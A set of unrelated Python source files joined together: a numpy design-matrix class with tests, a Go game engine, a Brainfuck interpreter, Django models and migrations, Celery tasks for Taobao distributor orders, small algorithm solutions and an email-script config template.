got = _format_float_column(precision, np.asarray(numbers))
print got, expected
assert np.array_equal(got, expected)
# This acts weird on old python versions (e.g. it can be "-nan"), so don't
# hardcode it:
nan_string = "%.3f" % (np.nan,)
t(3, [1, 2.1234, 2.1239, np.nan], ["1.000", "2.123", "2.124", nan_string])
t(3, [1, 2, 3, np.nan], ["1", "2", "3", nan_string])
t(3, [1.0001, 2, 3, np.nan], ["1", "2", "3", nan_string])
t(4, [1.0001, 2, 3, np.nan], ["1.0001", "2.0000", "3.0000", nan_string])
# http://docs.scipy.org/doc/numpy/user/basics.subclassing.html#slightly-more-realistic-example-attribute-added-to-existing-array
class DesignMatrix(np.ndarray):
"""A simple numpy array subclass that carries design matrix metadata.
.. attribute:: design_info
A :class:`DesignInfo` object containing metadata about this design
matrix.
This class also defines a fancy __repr__ method with labeled
columns. Otherwise it is identical to a regular numpy ndarray.
.. warning::
You should never check for this class using
:func:`isinstance`. Limitations of the numpy API mean that it is
impossible to prevent the creation of numpy arrays that have type
DesignMatrix, but that are not actually design matrices (and such
objects will behave like regular ndarrays in every way). Instead, check
for the presence of a ``.design_info`` attribute -- this will be
present only on "real" DesignMatrix objects.
"""
def __new__(cls, input_array, design_info=None,
default_column_prefix="column"):
"""Create a DesignMatrix, or cast an existing matrix to a DesignMatrix.
A call like::
DesignMatrix(my_array)
will convert an arbitrary array_like object into a DesignMatrix.
The return from this function is guaranteed to be a two-dimensional
ndarray with a real-valued floating point dtype, and a
``.design_info`` attribute which matches its shape. If the
`design_info` argument is not given, then one is created via
:meth:`DesignInfo.from_array` using the given
`default_column_prefix`.
Depending on the input array, it is possible this will pass through
its input unchanged, or create a view.
"""
# Pass through existing DesignMatrixes. The design_info check is
# necessary because numpy is sort of annoying and cannot be stopped
# from turning non-design-matrix arrays into DesignMatrix
# instances. (E.g., my_dm.diagonal() will return a DesignMatrix
# object, but one without a design_info attribute.)
if (isinstance(input_array, DesignMatrix)
and hasattr(input_array, "design_info")):
return input_array
self = atleast_2d_column_default(input_array).view(cls)
# Upcast integer to floating point
if np.issubdtype(self.dtype, np.integer):
self = np.asarray(self, dtype=float).view(cls)
if self.ndim > 2:
raise ValueError, "DesignMatrix must be 2d"
assert self.ndim == 2
if design_info is None:
design_info = DesignInfo.from_array(self, default_column_prefix)
if len(design_info.column_names) != self.shape[1]:
raise ValueError("wrong number of column names for design matrix "
"(got %s, wanted %s)"
% (len(design_info.column_names), self.shape[1]))
self.design_info = design_info
if not np.issubdtype(self.dtype, np.floating):
raise ValueError, "design matrix must be real-valued floating point"
return self
__repr__ = repr_pretty_delegate
def _repr_pretty_(self, p, cycle):
if not hasattr(self, "design_info"):
# Not a real DesignMatrix
p.pretty(np.asarray(self))
return
assert not cycle
# XX: could try calculating width of the current terminal window:
# http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
# sadly it looks like ipython does not actually pass this information
# in, even if we use _repr_pretty_ -- the pretty-printer object has a
# fixed width it always uses. (As of IPython 0.12.)
MAX_TOTAL_WIDTH = 78
SEP = 2
INDENT = 2
MAX_ROWS = 30
PRECISION = 5
names = self.design_info.column_names
column_name_widths = [len(name) for name in names]
min_total_width = (INDENT + SEP * (self.shape[1] - 1)
+ np.sum(column_name_widths))
if min_total_width <= MAX_TOTAL_WIDTH:
printable_part = np.asarray(self)[:MAX_ROWS, :]
formatted_cols = [_format_float_column(PRECISION,
printable_part[:, i])
for i in xrange(self.shape[1])]
column_num_widths = [max([len(s) for s in col])
for col in formatted_cols]
column_widths = [max(name_width, num_width)
for (name_width, num_width)
in zip(column_name_widths, column_num_widths)]
total_width = (INDENT + SEP * (self.shape[1] - 1)
+ np.sum(column_widths))
print_numbers = (total_width < MAX_TOTAL_WIDTH)
else:
print_numbers = False
p.begin_group(INDENT, "DesignMatrix with shape %s" % (self.shape,))
p.breakable("\n" + " " * p.indentation)
if print_numbers:
# We can fit the numbers on the screen
sep = " " * SEP
# list() is for Py3 compatibility
for row in [names] + list(zip(*formatted_cols)):
cells = [cell.rjust(width)
for (width, cell) in zip(column_widths, row)]
p.text(sep.join(cells))
p.text("\n" + " " * p.indentation)
if MAX_ROWS < self.shape[0]:
p.text("[%s rows omitted]" % (self.shape[0] - MAX_ROWS,))
p.text("\n" + " " * p.indentation)
else:
p.begin_group(2, "Columns:")
p.breakable("\n" + " " * p.indentation)
p.pretty(names)
p.end_group(2, "")
p.breakable("\n" + " " * p.indentation)
p.begin_group(2, "Terms:")
p.breakable("\n" + " " * p.indentation)
for term_name, span in self.design_info.term_name_slices.iteritems():
if span.start != 0:
p.breakable(", ")
p.pretty(term_name)
if span.stop - span.start == 1:
coltext = "column %s" % (span.start,)
else:
coltext = "columns %s:%s" % (span.start, span.stop)
p.text(" (%s)" % (coltext,))
p.end_group(2, "")
if not print_numbers or self.shape[0] > MAX_ROWS:
# some data was not shown
p.breakable("\n" + " " * p.indentation)
p.text("(to view full data, use np.asarray(this_obj))")
p.end_group(INDENT, "")
# No __array_finalize__ method, because we don't want slices of this
# object to keep the design_info (they may have different columns!), or
# anything fancy like that.
def test_design_matrix():
from nose.tools import assert_raises
di = DesignInfo(["a1", "a2", "a3", "b"],
term_name_slices=[("a", slice(0, 3)),
("b", slice(3, 4))])
mm = DesignMatrix([[12, 14, 16, 18]], di)
assert mm.design_info.column_names == ["a1", "a2", "a3", "b"]
bad_di = DesignInfo(["a1"])
assert_raises(ValueError, DesignMatrix, [[12, 14, 16, 18]], bad_di)
mm2 = DesignMatrix([[12, 14, 16, 18]])
assert mm2.design_info.column_names == ["column0", "column1", "column2",
"column3"]
mm3 = DesignMatrix([12, 14, 16, 18])
assert mm3.shape == (4, 1)
# DesignMatrix always has exactly 2 dimensions
assert_raises(ValueError, DesignMatrix, [[[1]]])
# DesignMatrix constructor passes through existing DesignMatrixes
mm4 = DesignMatrix(mm)
assert mm4 is mm
# But not if they are really slices:
mm5 = DesignMatrix(mm.diagonal())
assert mm5 is not mm
mm6 = DesignMatrix([[12, 14, 16, 18]], default_column_prefix="x")
assert mm6.design_info.column_names == ["x0", "x1", "x2", "x3"]
# Only real-valued matrices can be DesignMatrixs
assert_raises(ValueError, DesignMatrix, [1, 2, 3j])
assert_raises(ValueError, DesignMatrix, ["a", "b", "c"])
assert_raises(ValueError, DesignMatrix, [1, 2, object()])
# Just smoke tests
repr(mm)
repr(DesignMatrix(np.arange(100)))
repr(DesignMatrix(np.arange(100) * 2.0))
repr(mm[1:, :])
repr(DesignMatrix(np.arange(100).reshape((1, 100))))
repr(DesignMatrix([np.nan, np.inf]))
repr(DesignMatrix([np.nan, 0, 1e20, 20.5]))
|
class Solution(object):
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
int_32_max = 2147483647
int_32_min = -int_32_max - 1
positive = 1 if x >= 0 else -1
x *= positive
result = 0
while x is not 0:
digit = x % 10
if result != 0:
if int_32_max/result < 10 or int_32_max - result * 10 < digit \
or int_32_min/-result < 10 or int_32_min + result * 10 > -digit:
return 0
result = result * 10 + digit
x /= 10
return result * positive
import unittest
class TestSolution(unittest.TestCase):
def test_solution(self):
print Solution().reverse(-7463847412)
|
from functools import reduce
from copy import deepcopy
def neighbours(piece, board, toS = '.'):
liberties = set()
for i in (1, 0), (0, 1), (-1, 0), (0, -1):
move = (i[0] + piece[0], i[1] + piece[1])
try:
if min(move) > -1 and board[move[0]][move[1]] == toS:
liberties.add(move)
except:
pass
return liberties
class cluster:
def __init__(self, colour):
self.colour = colour
self.pieces = []
self.liberty = set()
def add(self, piece, board):
r = deepcopy(self.liberty)
self.liberty = self.liberty.union(neighbours(piece, board))
self.liberty.discard(piece)
self.pieces.append(piece)
return list(self.liberty - r)
def __add__(self, other):
self.liberty = self.liberty.union(other.liberty)
self.pieces += other.pieces
T = cluster(self.colour)
T.liberty = self.liberty
T.pieces = self.pieces
return T
def check_op(self, piece):
discarded = []
if piece in self.liberty:
self.liberty.discard(piece)
discarded.append(piece)
return discarded
def check_ad(self, piece):
return piece in self.liberty
def __eq__(self, other):
return self.pieces == other.pieces
class Go:
def __init__(self, h , w = None):
w = h if not w else w
if w > 26 or h > 26: raise ValueError("You're not allowed to play with that big board")
self.w = w
self.h = h
self.board = [['.' for i in range(w)] for i in range(h)]
self.player = "x"
self.alphabet = "ABCDEFGHJKLMNOPQRSTUVWXYZ"
self.o_clusters = []
self.x_clusters = []
self.moves = []
self.handiF = 0
def move(self, *sequence):
# print(sequence)
for move in sequence:
rollB = 0
MOVE = {}
a, b = self.h - int(move[:-1]), self.alphabet.index(move[-1])
if self.board[a][b] != '.':
raise ValueError()
MOVE = {'move_loc': (a, b), 'color': self.player}
MOVE['board'] = '\n'.join([''.join(i) for i in self.board])
self.board[a][b] = self.player
MOVE['reductions'] = []
opposite = self.x_clusters if self.player == 'o' else self.o_clusters
for i in range(len(opposite)):
k = opposite[i].check_op((a, b))
if k:
MOVE['reductions'].append((opposite[i], k))
to_be_deleted = []; MOVE['deletions'] = []
deleted_piece = []
for i in range(len(opposite)):
if len(opposite[i].liberty) == 0:
to_be_deleted.append(i)
MOVE['deletions'].append(opposite[i])
for j in opposite[i].pieces:
if neighbours(j, self.board, 'x' if self.player == 'x' else 'o'):
deleted_piece += [(i, j) for i in neighbours(j, self.board, 'x' if self.player == 'x' else 'o')]
self.board[j[0]][j[1]] = '.'
for i in to_be_deleted[::-1]:
del opposite[i]
player = self.x_clusters if self.player == "x" else self.o_clusters
flag = 0; MOVE['lib_change'] = []
possible = []
for i in range(len(player)):
for ll in deleted_piece:
if ll[0] in player[i].pieces:
player[i].liberty.add(ll[1])
if player[i].check_ad((a, b)):
flag = 1
possible.append(i)
dis = player[i].add((a, b), self.board)
MOVE['lib_change'].append((player[i], (('-', (a, b)), ) + tuple([('+', k) for k in dis])))
# if len(player[i].liberty) == 0:
# rollB = 1
MOVE['cluster'] = None
if flag == 0:
new_cluster = cluster(self.player)
new_cluster.add((a, b), self.board)
if len(new_cluster.liberty) == 0:
rollB = 1
MOVE['cluster'] = new_cluster
player.append(new_cluster)
MOVE['merges'] = []
if len(possible) > 1:
initial = [player[i] for i in possible]
final = reduce(lambda a, b: a + b, initial)
player[possible[0]] = final
MOVE['merges'] = [initial, final]
for f in possible[1:][::-1]:
del player[f]
#protection
if self.player == 'x':
self.x_clusters = player
self.o_clusters = opposite
else:
self.o_clusters = player
self.x_clusters = opposite
print(rollB)
if move:
print("The game and move was", move)
print("________________________v_____________________")
print(" " + " ".join("ABCDEFGHJKLMNOPQRSTUVWXYZ"[:self.w]))
print("\n".join([str(self.h - j).zfill(2) + " " + ' '.join(i) for j, i in enumerate(self.board)]))
print("\n\n")
print("________________________^______________________")
if len(self.moves) > 2 and 'board' in self.moves[-1] and self.moves[-1]['board'] == '\n'.join([''.join(i) for i in self.board]):
rollB = 1
self.moves.append(MOVE)
if rollB:
self.rollback(1, 1)
raise ValueError()
self.player = 'x' if self.player == 'o' else 'o'
return self.board
def get_position(self, st):
l = self.alphabet.index(st[-1])
n = self.w - int(st[:-1])
return self.board[n][l]
def handicap_stones(self, n):
print("Yes handicapping",n)
handi = {9: [(2, 6), (6, 2), (6, 6), (2, 2), (4, 4)],
13: [(3, 9), (9, 3), (9, 9), (3, 3), (6, 6), (6, 3), (6, 9), (3, 6), (9, 6)],
19: [(3, 15), (15, 3), (15, 15), (3, 3),(9, 9), (9, 3), (9, 15), (3, 9), (15, 9)]
}
if self.h == self.h and self.h not in handi or n > len(handi[self.h]) or self.handiF == 1 or self.moves:
raise ValueError()
for pos in handi[self.h][:n]:
self.board[pos[0]][pos[1]] = 'x'
self.last = 'o'
self.handiF = 1
@property
def turn(self):
return "black" if self.player == 'x' else "white"
def pass_turn(self):
print("turn was passed")
self.moves.append({})
self.player = "x" if self.player == "o" else "o"
def reset(self):
print("Resetted")
self.board = [['.']*self.w for i in range(self.h)]
self.last = None
self.moves = []
self.handiF = 0
self.player = 'x'
@property
def size(self):
return {"height":self.h, "width": self.w}
def rollback(self, x, flag = 0):
print("Rollbacks were done", x, flag)
if x > len(self.moves):
raise ValueError()
for i in range(x):
MOVE = self.moves.pop()
if not MOVE:
self.player = 'x' if self.player == 'o' else 'o'
continue
self.board = [list(i) for i in MOVE['board'].split("\n")]
player = self.x_clusters if self.player == ('o' if not flag else 'x') else self.o_clusters
if MOVE['cluster']:
player.remove(MOVE['cluster'])
if MOVE['merges']:
player.remove(MOVE['merges'][1])
player += MOVE['merges'][0]
opposite = self.o_clusters if self.player == ('o' if not flag else 'x') else self.x_clusters
if MOVE['deletions']:
opposite += MOVE['deletions']
for k in MOVE['reductions']:
for _ in k[1]:
opposite[opposite.index(k[0])].liberty.add(_)
for l in MOVE['lib_change']:
# print(MOVE['lib_change'])
ff = player.index(l[0])
player[ff].pieces.append(MOVE['move_loc'])
for p in l[1]:
if p[0] == '-':
player[ff].liberty.add(p[1])
else:
player[ff].liberty.discard(p[1])
if flag == 1:
if self.player == 'x':
self.x_clusters = player
self.o_clusters = opposite
else:
self.x_clusters = opposite
self.o_clusters = player
else:
if self.player == 'o':
self.x_clusters = player
self.o_clusters = opposite
self.player = 'x'
else:
self.x_clusters = opposite
self.o_clusters = player
|
# Generated by Django 3.1.4 on 2020-12-16 05:39
import datetime
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Doctor',
fields=[
('dni', models.IntegerField(default=10000000, primary_key=True, serialize=False, validators=[django.core.validators.MinValueValidator(10000000), django.core.validators.MaxValueValidator(99999999)])),
('contraseña', models.CharField(max_length=100)),
('Nusuarios', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Paciente',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('nombre', models.CharField(max_length=50, null=True)),
('apellido', models.CharField(max_length=50, null=True)),
('dni', models.IntegerField(default=10000000, validators=[django.core.validators.MinValueValidator(10000000), django.core.validators.MaxValueValidator(99999999)])),
('email', models.EmailField(blank=True, max_length=100)),
('contraseña', models.CharField(max_length=100)),
('telefono', models.IntegerField(blank=True, default=100000000, null=True, validators=[django.core.validators.MinValueValidator(100000000), django.core.validators.MaxValueValidator(999999999)])),
('doctor', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.doctor')),
],
),
migrations.CreateModel(
name='Parmetros_directos_sensados',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('frecuencia_cardiaca', models.FloatField(blank=True)),
('saturacion_de_oxigeno', models.FloatField(blank=True)),
('Fecha_de_la_medicion', models.DateField(default=datetime.date.today, verbose_name='Date')),
('Hora_de_la_medicion', models.TimeField()),
('Paciente', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='core.paciente')),
],
),
migrations.CreateModel(
name='Parametros_Morisky',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pregunta_1', models.BooleanField()),
('pregunta_2', models.BooleanField()),
('pregunta_3', models.BooleanField()),
('pregunta_4', models.BooleanField()),
('pregunta_5', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)])),
('Fecha_de_la_medicion', models.DateField(default=datetime.date.today, verbose_name='Date')),
('Paciente', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='core.paciente')),
],
),
migrations.CreateModel(
name='Parametros_Borg',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('puntaje', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)])),
('Fecha_de_la_medicion', models.DateField(default=datetime.date.today, verbose_name='Date')),
('Hora_de_la_medicion', models.TimeField()),
('Paciente', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='core.paciente')),
],
),
]
|
# -*- coding: UTF-8 -*-
import smtplib,traceback,os,sys,time,os.path,base64
import urllib,urllib2
import redis
class RedisServer:
def __init__(self,host='127.0.0.1',port=6379):
self.addr = (host,port)
self.cache = redis.StrictRedis(host,port)
def get(self,key):
return self.cache.get(key)
def set(self,key,value,expire=None):
self.cache.set(key,value,expire)
def delete(self,key):
self.cache.delete(key)
if __name__ == '__main__':
res = RedisServer()
|
#-*- coding:utf8 -*-
import time
import datetime
import calendar
from celery.task import task
from celery.task.sets import subtask
from django.conf import settings
from shopback.fenxiao.models import PurchaseOrder,FenxiaoProduct,SubPurchaseOrder
from auth.apis.exceptions import UserFenxiaoUnuseException,TaobaoRequestException
from shopback.monitor.models import TradeExtraInfo,SystemConfig,DayMonitorStatus
from shopback.trades.models import MergeTrade
from shopback import paramconfig as pcfg
from shopback.users import Seller
from common.utils import (format_time,
format_datetime,
format_year_month,
parse_datetime,
single_instance_task)
from auth import apis
import logging
__author__ = 'meixqhi'
logger = logging.getLogger('django.request')
@task()
def saveUserFenxiaoProductTask(seller_id):
seller = Seller.getSellerByVisitorId(seller_id)
if not seller.has_fenxiao:
return
fenxiao_product_ids = []
try:
has_next = True
cur_page = 0
while has_next:
response_list = apis.taobao_fenxiao_products_get(page_no=cur_page,
page_size=settings.TAOBAO_PAGE_SIZE/2,
tb_user_id=seller_id)
products = response_list['fenxiao_products_get_response']
if products['total_results'] > 0:
fenxiao_product_list = products['products']['fenxiao_product']
for fenxiao_product in fenxiao_product_list:
FenxiaoProduct.save_fenxiao_product_dict(seller_id,fenxiao_product)
fenxiao_product_ids.append(fenxiao_product['pid'])
total_nums = products['total_results']
cur_nums = cur_page*settings.TAOBAO_PAGE_SIZE/2
has_next = cur_nums<total_nums
cur_page += 1
except UserFenxiaoUnuseException,exc:
logger.warn(u'该用户非分销平台用户:%s,%s'%(str(seller_id),exc.message))
except TaobaoRequestException,exc:
logger.error(u'分销商品更新异常:%s'%exc.message,exc_info=True)
else:
FenxiaoProduct.objects.filter(user__visitor_id=seller_id)\
.exclude(pid__in=fenxiao_product_ids).update(status=FenxiaoProduct.DOWN)
@task(max_retries=3)
def saveUserPurchaseOrderTask(seller_id,update_from=None,update_to=None,status=None):
seller = Seller.getSellerByVisitorId(seller_id)
if not seller.has_fenxiao:
return
from shopback.trades.service import TradeService,PurchaseOrderService
try:
if not (update_from and update_to):
update_from = datetime.datetime.now() - datetime.timedelta(28,0,0)
update_to = datetime.datetime.now()
exec_times = (update_to - update_from).days/7+1
for i in range(0,exec_times):
dt_f = update_from + datetime.timedelta(i*7,0,0)
dt_t = update_from + datetime.timedelta((i+1)*7,0,0)
has_next = True
cur_page = 1
while has_next:
response_list = apis.taobao_fenxiao_orders_get(tb_user_id=seller_id,
page_no=cur_page,
time_type='trade_time_type',
page_size=settings.TAOBAO_PAGE_SIZE/2,
start_created=dt_f,
end_created=dt_t,
status=status)
orders_list = response_list['fenxiao_orders_get_response']
if orders_list['total_results']>0:
for o in orders_list['purchase_orders']['purchase_order']:
modified = datetime.datetime.strptime(o['modified'],'%Y-%m-%d %H:%M:%S')
if TradeService.isValidPubTime(seller_id,o['id'],modified):
purchase_order = PurchaseOrderService.savePurchaseOrderByDict(seller_id,o)
PurchaseOrderService.createMergeTrade(purchase_order)
total_nums = orders_list['total_results']
cur_nums = cur_page*settings.TAOBAO_PAGE_SIZE
has_next = cur_nums<total_nums
cur_page += 1
except Exception,exc:
logger.error(u'分销订单下载失败:%s'%exc.message,exc_info=True)
raise saveUserPurchaseOrderTask.retry(exc=exc,countdown=60)
@task()
def saveUserIncrementPurchaseOrderTask(seller_id,update_from=None,update_to=None):
seller = Seller.getSellerByVisitorId(seller_id)
if not seller.has_fenxiao:
return
update_from = format_datetime(update_from)
update_to = format_datetime(update_to)
from shopback.trades.service import TradeService,PurchaseOrderService
has_next = True
cur_page = 1
while has_next:
response_list = apis.taobao_fenxiao_orders_get(tb_user_id=seller_id,
page_no=cur_page,
time_type='update_time_type',
page_size=settings.TAOBAO_PAGE_SIZE/2,
start_created=update_from,
end_created=update_to)
orders_list = response_list['fenxiao_orders_get_response']
if orders_list['total_results']>0:
for o in orders_list['purchase_orders']['purchase_order']:
modified = datetime.datetime.strptime(o['modified'],'%Y-%m-%d %H:%M:%S')
if TradeService.isValidPubTime(seller_id,o['id'],modified):
purchase_order = PurchaseOrderService.savePurchaseOrderByDict(seller_id,o)
PurchaseOrderService.createMergeTrade(purchase_order)
total_nums = orders_list['total_results']
cur_nums = cur_page*settings.TAOBAO_PAGE_SIZE
has_next = cur_nums<total_nums
cur_page += 1
@task()
def updateAllUserIncrementPurchaseOrderTask(update_from=None,update_to=None):
update_handler = update_from and update_to
dt = datetime.datetime.now()
if update_handler:
time_delta = update_to - update_from
update_days = time_delta.days+1
else:
update_to = datetime.datetime(dt.year,dt.month,dt.day,0,0,0)
update_days = 1
sellers = Seller.effect_users.TAOBAO
for user in sellers:
for i in xrange(0,update_days):
update_start = update_to - datetime.timedelta(i+1,0,0)
update_end = update_to - datetime.timedelta(i,0,0)
year = update_start.year
month = update_start.month
day = update_start.day
monitor_status,state = DayMonitorStatus.objects.get_or_create(user_id=user.visitor_id,
year=year,
month=month,
day=day)
try:
if not monitor_status.update_purchase_increment:
saveUserIncrementPurchaseOrderTask(user.visitor_id,
update_from=update_start,
update_to=update_end)
except Exception,exc:
logger.error('%s'%exc,exc_info=True)
else:
monitor_status.update_purchase_increment = True
monitor_status.save()
@single_instance_task(60*60,prefix='shopback.fenxiao.tasks.')
def updateAllUserIncrementPurchasesTask():
""" 增量更新分销平台订单信息 """
dt = datetime.datetime.now()
sysconf = SystemConfig.getconfig()
sellers = Seller.effect_users.TAOBAO
updated = sysconf.fenxiao_order_updated
try:
for user in sellers:
if not updated:
saveUserPurchaseOrderTask(user.visitor_id,
status=pcfg.WAIT_SELLER_SEND_GOODS)
continue
bt_dt = dt-updated
if bt_dt.days>=1:
saveUserPurchaseOrderTask(user.visitor_id,
status=pcfg.WAIT_SELLER_SEND_GOODS)
else:
saveUserIncrementPurchaseOrderTask(user.visitor_id,
update_from=updated,
update_to=dt)
saveUserPurchaseOrderTask(user.visitor_id,
status=pcfg.WAIT_SELLER_SEND_GOODS)
except Exception,exc:
logger.error('%s'%exc,exc_info=True)
else:
SystemConfig.objects.filter(id=sysconf.id).update(fenxiao_order_updated=dt)
|
# Generated by Django 2.2 on 2020-12-23 09:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app1', '0002_auto_20201221_2255'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='user_comment_likes',
field=models.ManyToManyField(related_name='comment_likes', to='app1.User'),
),
]
|
from django.contrib.auth.models import User
from django.db import models
from django.core.exceptions import ValidationError
# Our apps:
from utils import unique_slugify
class Group(models.Model):
"""
Users (below) may belong to a group.
"""
name = models.CharField(verbose_name='Group name',
max_length=50,
help_text='Users might belong to a group',
)
def __unicode__(self):
return self.name
class Meta:
ordering = ['name', ]
class UserProfile(models.Model):
# See https://docs.djangoproject.com/en/1.3/topics/auth/
user = models.OneToOneField(User, unique=True, related_name="profile")
# Slug field
slug = models.SlugField(editable=False)
# User's role
role_choice = (
('Superuser', 'Superuser'), # Django superuser
('Instructor', 'Instructor'), # Highest level
('TA', 'TA'), # Next highest level
('Student', 'Student'), # Lowest level
('Contributor', 'Contributor'), # Just to acknowledge contribs
('Grader', 'Grader'), # Auto-grader
)
role = models.CharField(choices=role_choice, max_length=20,
default='Student')
student_number = models.CharField(max_length=20, blank=True)
courses = models.ManyToManyField('course.Course')
group = models.ForeignKey(Group, blank=True, null=True)
class Meta:
verbose_name_plural = 'users'
def save(self, *args, **kwargs):
""" Override the model's saving function to create the slug """
# http://docs.djangoproject.com/en/dev/topics/db/models/
#overriding-predefined-model-methods
unique_slugify(self, self.user.username, 'slug')
# Call the "real" save() method.
super(UserProfile, self).save(*args, **kwargs)
def __unicode__(self):
return self.slug
def get_peers(self):
if self.group:
userP = list(UserProfile.objects.filter(group=self.group))
userP.remove(self)
out = []
for item in userP:
out.append(('%s %s' % (item.user.first_name,
item.user.last_name), item.user.username))
return(out)
else:
return []
class Token(models.Model):
"""
Manages the unique sign-in tokens. Tokens are purely for authentication of
the user. They are never used to authorize access to any type of info.
"""
user = models.ForeignKey(User)
token_address = models.CharField(max_length=250)
has_been_used = models.BooleanField(default=False)
def __unicode__(self):
return u'%s, %s, %s' % (str(self.has_been_used), str(self.user),
self.token_address)
class Timing(models.Model):
"""
Manages the start and end times of various tests. This is the primary
authorization mechanism.
Timing objects are not created when the QSet requested is outside of its
start and end time. e.g. when the user is signing in to review answers
from prior QSets or for other courses.
"""
user = models.ForeignKey(UserProfile)
start_time = models.DateTimeField()
final_time = models.DateTimeField()
qset = models.ForeignKey('question.QSet')
token = models.ForeignKey(Token)
def __unicode__(self):
return 'User %s -- Start: [%s] and Final [%s]' % \
(self.user.slug,
self.start_time.strftime('%H:%M:%S on %d %h %Y'),
self.final_time.strftime('%H:%M:%S on %d %h %Y'))
def save(self, *args, **kwargs):
if self.start_time >= self.final_time:
raise ValidationError('Start time must be earlier than end time.')
if self.start_time < self.qset.ans_time_start:
raise ValidationError('Start time must be later than QSet start time.')
if self.start_time > self.qset.ans_time_final:
raise ValidationError('Cannot start test after QSet final time.')
if self.final_time < self.qset.ans_time_start:
raise ValidationError('Cannot end test before QSet start time.')
if self.final_time > self.qset.ans_time_final:
raise ValidationError('Cannot end test after QSet final time.')
super(Timing, self).save(*args, **kwargs)
|
from django.db import models
# Create your models here.
class User(models.Model):
fname = models.CharField(max_length=264)
lname = models.CharField(max_length=264)
email = models.EmailField(max_length=264)
def __str__(self):
return self.fname+ ' ' + self.lname
|
import wavelet97lift as dwt
def png_cmp(s,s1):
im = dwt.Image.open(s)
im1 = dwt.Image.open(s1)
pix = im.load()
m = list(im.getdata())
m = [m[i:i+im.size[0]] for i in range(0, len(m), im.size[0])]
pix1 = im1.load()
m1 = list(im1.getdata())
m1 = [m1[i:i+im.size[0]] for i in range(0, len(m1), im1.size[0])]
for row in range(0, len(m)):
for col in range(0, len(m[0])):
m[row][col] = float(m[row][col])
m1[row][col] = float(m1[row][col])
max = 0.0
mse = 0.0
for row in range(0, len(m1)):
for col in range(0, len(m1[0])):
mse = (m[row][col] - m1[row][col]) **2
d = m[row][col] - m1[row][col]
if d >= max:
max = d
#print mse
print 'mse = ',mse/(im1.size[0]*im1.size[1])
print 'max = ', max
png_cmp("../lena_256.png","test1_256_iwt.png")
|
N = int( input())
A = list( map( int, input().split()))
S = [ -A[i] for i in range(N) if A[i] <= 0]
T = list( map( abs, A))
ans = sum(T)
if len(S)%2 != 0:
ans -= min(T)*2
print(ans)
|
"""Args to define training and optimizer hyperparameters"""
def add_args(parser):
parser.add_argument('--seed', help='Random seed', type=int, default=0)
|
import sys
BUFFER = [int(i) for i in '0' * 3000]
ip = 0 # stands for instruction pointer
# API
def inc_p():
global ip
global BUFFER
ip += 1
def dec_p():
global ip
global BUFFER
ip -= 1
def inc_b():
global ip
global BUFFER
BUFFER[ip] += 1
def dec_b():
global ip
global BUFFER
BUFFER[ip] -= 1
def out_b():
global ip
global BUFFER
sys.stdout.write(chr(BUFFER[ip]))
#print BUFFER[ip]
def inp_b():
global ip
global BUFFER
BUFFER[ip] = getchar()
def loop(code):
global ip
global BUFFER
#print '---In loop---'
while BUFFER[ip] != 0:
# print '-> In loop loop', BUFFER[:5], code
eval_brainfuck(code)
legal_commands = {'>' : inc_p,
'<' : dec_p,
'+' : inc_b,
'-' : dec_b,
'.' : out_b,
',' : inp_b,
'[' : loop }
# ']' => loop] we will never get to '[' according to the design of the API
def getchar():
return ord(raw_input()[0])
def no_of_occurences(code, c):
depth = 0
a = code.find(c)
while a != -1:
#print a
a = code.find(c, a+1)
depth += 1
return depth
def skip_occurences(code, a, times):
c = -1
while times > 0:
c = code.find(a, c+1)
if c == -1:
return -1
times -= 1
return c
# Note: The code gets really ugly from this point. User discretion is advised
def eval_brainfuck(code):
if not isinstance(code, str):
return -1
else:
c = 0 # loop counter
while c < len(code):
#print code[c], c
if code[c] in legal_commands:
if code[c] == '[':
a = 0 # another loop counter
depth = 0 # depth of the loop
# let us check that there are no loops i.e '[' inside this loop block
end_loop = code.find(']', c)
if end_loop == -1:
return -1
depth = no_of_occurences(code[c+1:end_loop], '[')
#print depth, code[c+1:end_loop]
# now we know the depth of this loop lets now figure out the ending point
if depth > 0:
rel_c = skip_occurences(code[c+1:], ']', depth)
a = rel_c + len(code[:c+1])
b = code.find(']', a+1)
if b == -1:
return -1
else:
depth = no_of_occurences(code[a+1:b], '[')
if depth > 0:
# We got more loops inside the parent loop
rel_a = skip_occurences(code[a+1:], ']', depth) # this position is relative to a+1 we want it withit relative to c+1
a = rel_a + a
b = code.find(']', a+1)
if b == -1:
return -1
end_loop = b
# print code[c:end_loop]
# print c, b, a, depth
#print 'Calling Loop =>' , ip, code[c+1:end_loop], BUFFER[0:5]
loop(code[c+1:end_loop])
#print '\n\n----loop ends----\n\n'
c = end_loop
else:
legal_commands[code[c]]()
c += 1
eval_brainfuck(raw_input())
|
# replace the following with your own before running the script
import datetime
# email details
fromaddr = # your gmail addres
pwd = # RISK OF PASSWORD BREACH! DON'T PUBLISH THIS!!!
toaddr = # your recepients
Cc = # if any cc's
host = 'smtp.gmail.com'
port = 587
# email content
today = str(datetime.date.today())
# today = '2020-09-06'
filename = 'episode_performance_{}.pdf'.format(today)
filepath = # your path for the file to attach
subject = # your email subject title
body = # your email body
# set paths for local saved files
folder_path = # local saved folder
master_path = # master dataset
file = # daily snapshot of data refresh
figure_path = # daily refreshed file path
# data crawling
album_url = # url for your Ximalaya album to crawl
